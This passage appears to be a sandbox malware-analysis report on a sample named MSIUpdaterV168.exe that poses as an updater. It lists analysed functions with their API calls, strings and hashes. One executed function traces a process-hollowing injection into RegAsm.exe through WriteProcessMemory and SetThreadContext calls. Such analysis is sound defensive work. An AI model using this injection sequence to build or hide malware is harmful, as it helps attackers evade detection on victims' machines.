Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 1fbe4fdad8757e0cb5a7987df19eef34152eae546b84d825ba505dc8a82e62a3
Instruction ID: 1f03394e07a890652c80247203da51dceb4fdb4686bd691c1637c3308636850b
Opcode Fuzzy Hash: 1fbe4fdad8757e0cb5a7987df19eef34152eae546b84d825ba505dc8a82e62a3
Instruction Fuzzy Hash: 21411671D04209AFCF26DF98CD81AEEBBB6BF48301F19409AF904A7311D7359A50DB52

Function 006D2420 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006D2425
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 006D246A

Part of subcall function 006D5578: _Yarn.LIBCPMT ref: 006D5597
Part of subcall function 006D5578: _Yarn.LIBCPMT ref: 006D55BB

Strings

bad locale name, xrefs: 006D2478

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: dc83dc291ee636cc0a7bcc8e5ae35e16309265acd70867eefd7cc8c622921179
Instruction ID: 2f76e0848102bdb809499655cd968d533ffa9f0350234c95b5a009ef486d3f54
Opcode Fuzzy Hash: dc83dc291ee636cc0a7bcc8e5ae35e16309265acd70867eefd7cc8c622921179
Instruction Fuzzy Hash: EEF0F460901B409ED3B19F399404743BAE1AF29310F048A5EE5CAC7B41E375E5488BAA

Function 006D2CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006D2CFF
std::_Lockit::~_Lockit.LIBCPMT ref: 006D2D1A

Strings

ios_base::badbit set, xrefs: 006D2CF1

Memory Dump Source

Source File: 0000000A.00000002.1873673429.00000000006D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006D0000, based on PE: true

Associated: 0000000A.00000002.1873276196.00000000006D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873772283.00000000006F5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1874438411.0000000000895000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d0000_6p7a7injLZJojhETBNhL.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: ios_base::badbit set
API String ID: 593203224-3882152299
Opcode ID: e3dd26cb24bdd6f44cfc9d2228d70647dc8eec2eafd49d6d72c68e97f0f709ed
Instruction ID: 2451cc7e4209e1527106276cd5410bd16af677b56c448c04604b359501094c54
Opcode Fuzzy Hash: e3dd26cb24bdd6f44cfc9d2228d70647dc8eec2eafd49d6d72c68e97f0f709ed
Instruction Fuzzy Hash: A1E01270800202AFD324EF18E881B91B3E1AB20321F20042FE081C2291EBB05DC0CB84

Analysis Process: MSIUpdaterV168.exePID: 8076, Parent PID: 1044COMMON

Executed Functions

Function 0074018D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,007400FF,007400EF), ref: 007402FC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0074030F
Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 0074032D
ReadProcessMemory.KERNELBASE(00000088,?,00740143,00000004,00000000), ref: 00740351
VirtualAllocEx.KERNELBASE(00000088,?,?,00003000,00000040), ref: 0074037C
WriteProcessMemory.KERNELBASE(00000088,00000000,?,?,00000000,?), ref: 007403D4
WriteProcessMemory.KERNELBASE(00000088,00400000,?,?,00000000,?,00000028), ref: 0074041F
WriteProcessMemory.KERNELBASE(00000088,?,?,00000004,00000000), ref: 0074045D
Wow64SetThreadContext.KERNEL32(0000008C,00750000), ref: 00740499
ResumeThread.KERNELBASE(0000008C), ref: 007404A8

Strings

TerminateProcess, xrefs: 0074038B
SetThreadContext, xrefs: 007402B3
ress, xrefs: 00740217
VirtualAlloc, xrefs: 00740254
VirtualAllocEx, xrefs: 0074028D
WriteProcessMemory, xrefs: 007402A0
aryA, xrefs: 007401D3
CreateProcessA, xrefs: 00740241
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 007402FB
ReadProcessMemory, xrefs: 0074027A
GetP, xrefs: 0074020F
GetThreadContext, xrefs: 00740267
Load, xrefs: 007401CB
ResumeThread, xrefs: 007402C9

Memory Dump Source

Source File: 0000000C.00000002.2022962497.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_740000_MSIUpdaterV168.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction ID: 49b9b93e0df3ecbf3905725fd5b207774ffe2c5a42fe5f57031a301b405f0d21
Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction Fuzzy Hash: 72B1E67664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CEB341D774FA518B94

Function 00144920 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 214
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,00144BD0,00000000,00000000,00000000), ref: 00144BBF
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,?,?,?,?,?,?,?,?,00144C76), ref: 00144BC8

Strings

Earth, xrefs: 00144AD3
Own head, xrefs: 00144AAD
C, xrefs: 00144955

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: CreateObjectSingleThreadWait
String ID: C$Earth$Own head
API String ID: 1891408510-3365287836
Opcode ID: ff339345457830c5ab73d3af65be2888d0f8fea539459b06a456b1a59a546f58
Instruction ID: 6d2812d1c3854af0d37ee250156e01380348c833885870a7a62149cdce5e6014
Opcode Fuzzy Hash: ff339345457830c5ab73d3af65be2888d0f8fea539459b06a456b1a59a546f58
Instruction Fuzzy Hash: F6717671A083419BD714DF34DCC5B2BB798FF95304F140A2DF8969B1A2E770EA688792

Function 00144D20 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 61
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(user32.dll,ShowWindow,E49B113A), ref: 00144D55
GetProcAddress.KERNEL32(00000000), ref: 00144D5C
GetConsoleWindow.KERNELBASE(?,00000000), ref: 00144D6B
GetModuleHandleA.KERNEL32(kernel32.dll,FreeConsole), ref: 00144D7F
GetProcAddress.KERNEL32(00000000), ref: 00144D86
FreeConsole.KERNELBASE ref: 00144D92

Part of subcall function 00144000: GetCurrentThreadId.KERNEL32 ref: 0014406A

Strings

user32.dll, xrefs: 00144D50
ShowWindow, xrefs: 00144D4B
FreeConsole, xrefs: 00144D75
kernel32.dll, xrefs: 00144D7A

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: AddressConsoleHandleModuleProc$CurrentFreeThreadWindow
String ID: FreeConsole$ShowWindow$kernel32.dll$user32.dll
API String ID: 245968307-4003964729
Opcode ID: 60154ca0d76ff0237aaec42381dcd6f53f5e0595e9cbca90cae724f28c7ce2c7
Instruction ID: 676b94bf606a6633637d9f6ebbfc8e3bdac54b20d633cf14caf323409bea191c
Opcode Fuzzy Hash: 60154ca0d76ff0237aaec42381dcd6f53f5e0595e9cbca90cae724f28c7ce2c7
Instruction Fuzzy Hash: 93110475E40704ABCB00EBB4ED09B9EB7F9EB48750F104525F401E72E1E771990086A1

Function 00136494 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,001365A1,?,?,00000001,00000000,?,?,0013680B,00000021,FlsSetValue,001494CC,001494D4,00000001), ref: 00136555

Strings

ext-ms-, xrefs: 001364FF
api-ms-, xrefs: 001364EB

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 00f9d70afd3f1de62e54eb0428bf9b03f7cc7f88e62194522dea0a2d4b557590
Instruction ID: 4421da6308c95691c41d66021114d51b9ead008d6e1239997fbe7c06f606bda2
Opcode Fuzzy Hash: 00f9d70afd3f1de62e54eb0428bf9b03f7cc7f88e62194522dea0a2d4b557590
Instruction Fuzzy Hash: 64210636A41310BBDB269B24EC84A5A3768EF427B0F254130F906A72E5E730EE00C6D4

Function 00144000 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 0014406A
std::_Throw_Cpp_error.LIBCPMT ref: 001440A5
std::_Throw_Cpp_error.LIBCPMT ref: 001440AC
std::_Throw_Cpp_error.LIBCPMT ref: 001440B3
std::_Throw_Cpp_error.LIBCPMT ref: 001440BA

Strings

Success created., xrefs: 00144003

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$CurrentThread
String ID: Success created.
API String ID: 2261580123-2637490038
Opcode ID: 3e08fbda151f1ccbdf517275de427c3fbeb76356b4a74cbe46f1375415b020b5
Instruction ID: c8c1708ce1cf482dad87a1b6ee6830b2c113d92998360c7d4338b4c64a210b40
Opcode Fuzzy Hash: 3e08fbda151f1ccbdf517275de427c3fbeb76356b4a74cbe46f1375415b020b5
Instruction Fuzzy Hash: 7911C671740B21ABE3307BB06C07B5B75C5AF20B41F104838FB48AB1D2EBB1983087A6

Function 0012E516 Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,Function_0000E3BA,00000000,?,?), ref: 0012E55F
GetLastError.KERNEL32 ref: 0012E56B
__dosmaperr.LIBCMT ref: 0012E572

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 6528ab419e367e15e8bf3fde154c24fecab9fc496e6fc9140a8ca31265cb8a29
Instruction ID: d295cc0f7a25f8097c6970c56fe13614e2b8b3c69a1e4bb60144c530f7cb4bbe
Opcode Fuzzy Hash: 6528ab419e367e15e8bf3fde154c24fecab9fc496e6fc9140a8ca31265cb8a29
Instruction Fuzzy Hash: BC015E76910229AFDF15AFA0EC05AAE7BE5EF10365F104168F801971A0EB71CE60DBA0

Function 00138A6D Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001381B7: GetConsoleOutputCP.KERNEL32(E49B113A,00000000,00000000,00000000), ref: 0013821A

WriteFile.KERNEL32(?,00000000,?,0014F498,00000000,0000000C,00000000,00000000,?,00000000,0014F498,00000010,00130642,00000000,00000000,00000000), ref: 00138BD6
GetLastError.KERNEL32(?,00000000), ref: 00138BE0

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 9a6a34a30e688e8af497a613d27e3c60bc788357157bac2f412961488bb79344
Instruction ID: c66ac0f7c19e91ed71e48938839cf06c536533a52a87f626640ddf8964b72d34
Opcode Fuzzy Hash: 9a6a34a30e688e8af497a613d27e3c60bc788357157bac2f412961488bb79344
Instruction Fuzzy Hash: B461BFB1D04349AFDF15CFA8C884AEEBBB9EF19318F144095F804AB256DB31D905CB60

Function 00144BD0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 107
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 00144C66

Strings

@$., xrefs: 00144C91

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: AllocVirtual
String ID: @$.
API String ID: 4275171209-2732964027
Opcode ID: d5c915f045cffa1dfc0324d6e9a1db21eb2fcf7a7949ee16d6c1db442b823d41
Instruction ID: 456edd2d732b84181cd1a7c8645138433d2544adadc267e524947b37e209ccd2
Opcode Fuzzy Hash: d5c915f045cffa1dfc0324d6e9a1db21eb2fcf7a7949ee16d6c1db442b823d41
Instruction Fuzzy Hash: 0C31A475E003189BDB04DFA8EC81BEEB7B4EF1D314F140159F904BB292EB759AA48764

Function 0013866F Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,00138BBC,00000000,00000000,00000000,?,0000000C,00000000), ref: 0013870B
GetLastError.KERNEL32(?,00138BBC,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,0014F498,00000010,00130642,00000000,00000000), ref: 00138731

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 7940259fdc1cddedde227bf583a996943f13ff6f6361f5bc44fa14a50c07f8fc
Instruction ID: 1aa8749074d595b4134d81d1cb8a441a6d8f7e60fb5dfe22046d1aee60d85372
Opcode Fuzzy Hash: 7940259fdc1cddedde227bf583a996943f13ff6f6361f5bc44fa14a50c07f8fc
Instruction Fuzzy Hash: 8A21A274A002199BCF15CF29DC919EDB7BAAF49301F2440AAF90AD7251DB30ED46CB60

Function 00136182 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 001361CE
GetFileType.KERNELBASE(00000000), ref: 001361E0

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: c5b07bf9d8059182773b543e88b4c6d43b353a9db55b5c9e98b4dbb397b078fe
Instruction ID: 98b020971983ba72eae7aba8dd33278d6b8be3f768e9d19734154a5119b541e2
Opcode Fuzzy Hash: c5b07bf9d8059182773b543e88b4c6d43b353a9db55b5c9e98b4dbb397b078fe
Instruction Fuzzy Hash: A71181315047416ADB348A3EDC886277E95AB96330F3A471AD4B6865F2C330D88AD250

Function 0012E3BA Relevance: 3.0, APIs: 2, Instructions: 38
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(0014F048,0000000C), ref: 0012E3CD
ExitThread.KERNEL32 ref: 0012E3D4

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: 977c27db516bfb97b8808d79652d07ab65150bde1b495c4342b169ae083b0823
Instruction ID: e15692222db55462046867436bc59ed0848c23e60ac900299fed7f4874cc956d
Opcode Fuzzy Hash: 977c27db516bfb97b8808d79652d07ab65150bde1b495c4342b169ae083b0823
Instruction Fuzzy Hash: 90F0F678900610EFDB10EFB0D84AA6E3BB1FF62701F104159F4059B6A2CB746D51CBA1

Function 00134F0C Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,0013C57D,?,00000000,?,?,0013C81E,?,00000007,?,?,0013CD17,?,?), ref: 00134F22
GetLastError.KERNEL32(?,?,0013C57D,?,00000000,?,?,0013C81E,?,00000007,?,?,0013CD17,?,?), ref: 00134F2D

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 9a003fd9d9aef931e7f747e8a8a076b67490d6f0358882807ecc6e8ceb09deba
Instruction ID: 114c2fd5a9fa8872d8361320e29b1687434b5b44c126d99c17542bb2accd52b8
Opcode Fuzzy Hash: 9a003fd9d9aef931e7f747e8a8a076b67490d6f0358882807ecc6e8ceb09deba
Instruction Fuzzy Hash: E7E08C36100A14ABCB212BA9BC09B9A3AADAB40755F140074F60CAB171DB30A891C784

Function 0012625D Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaccda1cb815c2b9e4a45a2a2149af4dd1a071b004a9c2fab01d9e062be7dc53
Instruction ID: 35e74d8a0167210d3a5a31b9d57ee34dc93339072862a9d1fb56a8f0dd053ee4
Opcode Fuzzy Hash: aaccda1cb815c2b9e4a45a2a2149af4dd1a071b004a9c2fab01d9e062be7dc53
Instruction Fuzzy Hash: EB31843290012AEFCF15CF64E9909EDB7B9BF19320B144259E505A76D0E731ED64CB90

Function 0013655F Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e64133e4b16156a7df8a2d64ae1b4c7468090a90aa35df67dfcc4c82d4c73a6
Instruction ID: 23e89924b833f6b8c745e668accdb2ee5807fc2e699b13eb5a7618392426a3b1
Opcode Fuzzy Hash: 3e64133e4b16156a7df8a2d64ae1b4c7468090a90aa35df67dfcc4c82d4c73a6
Instruction Fuzzy Hash: DA01B137740225BBDF1A8F69EC8595A33DAAB853B0B25C230F901CB199DB30DC158790

Non-executed Functions

Function 0013DD28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,0013E046,00000002,00000000,?,?,?,0013E046,?,00000000), ref: 0013DDC1
GetLocaleInfoW.KERNEL32(?,20001004,0013E046,00000002,00000000,?,?,?,0013E046,?,00000000), ref: 0013DDEA
GetACP.KERNEL32(?,?,0013E046,?,00000000), ref: 0013DDFF

Strings

ACP, xrefs: 0013DD46
OCP, xrefs: 0013DD7C

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022694501.00000000002E5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_120000_MSIUpdaterV168.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 476597b097e0dadbdbabc194f4ddd41b4624d019de54b28115efca597e102aed
Instruction ID: 8234659f623bc8678b2a38efdcd6ee4aa1048c2d8298b423301c7471acebf5bd
Opcode Fuzzy Hash: 476597b097e0dadbdbabc194f4ddd41b4624d019de54b28115efca597e102aed
Instruction Fuzzy Hash: 5A21B0A6B00100A7EB349F99F900B9777AAEF60F60F578064E90ADB190E732DE40C390

Function 0013DEFD Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001341E0: GetLastError.KERNEL32(?,00000008,0013708C), ref: 001341E4
Part of subcall function 001341E0: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 00134286

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0013E009
IsValidCodePage.KERNEL32(00000000), ref: 0013E052
IsValidLocale.KERNEL32(?,00000001), ref: 0013E061
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0013E0A9
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0013E0C8

Memory Dump Source

Source File: 0000000C.00000002.2022338691.0000000000121000.00000020.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 0000000C.00000002.2022312897.0000000000120000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2022391713.0000000000145000.00000002.00000001.01000000.00000007.sdmpDownload File
